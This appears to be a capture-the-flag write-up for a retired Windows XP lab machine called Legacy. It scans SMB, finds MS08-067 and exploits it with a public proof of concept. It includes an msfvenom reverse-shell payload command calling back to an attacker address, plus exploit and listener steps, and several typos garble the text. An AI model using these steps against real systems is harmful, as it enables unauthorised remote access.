Legacy machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags from this machine.
We perform a network scan with nmap to recognize the target machine.
Full Port Scan
As a result of port scanning, 135/tcp msrpc Microsoft Windows RPC, 139/tcp netbios-ssn Microsoft Windows netbios-ssn, 445/tcp microsoft-ds Windows XP microsoft-ds ports were found to be open.
Since the Windows xp operating system is used here, we understand that there is a vulnerability, let’s scan it with nmap and see what kind of vulnerability there is in the smb port.
nmap -T5 10.10.10.10.4 -Pn -p 445 –script vuln -vvvv -oN vulnscan.txt
scan for a vulnerability by smb with
Here we understand that there is a smb-vuln-ms08-067 vulnerability, let’s see if there is a poc exploit related to it.
Let’s look at the first gitbuh repo
We came across https://github.com/andyacer/ms08_067, it has a very explanatory area, I will try to use it by following the instructions given,
1- first downloaded the repo with git cline
git clone https://github.com/andyacer/ms08_067/
2- then impacket vehicles were landed because impack vehicles were needed
git clone –branch impacket_0_9_17 –single-branch https://github.com/CoreSecurity/impacket/
pip install .
3- created shellcode with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x5f\x2f\x2e\x40” -f c -a x86 –platform Windows
4- the generated shellcode was written into the python file
5- The port given with nc is listened
6- python file executed
After the exploit code ran, we got the shell.
Here we have lede user and rot flags.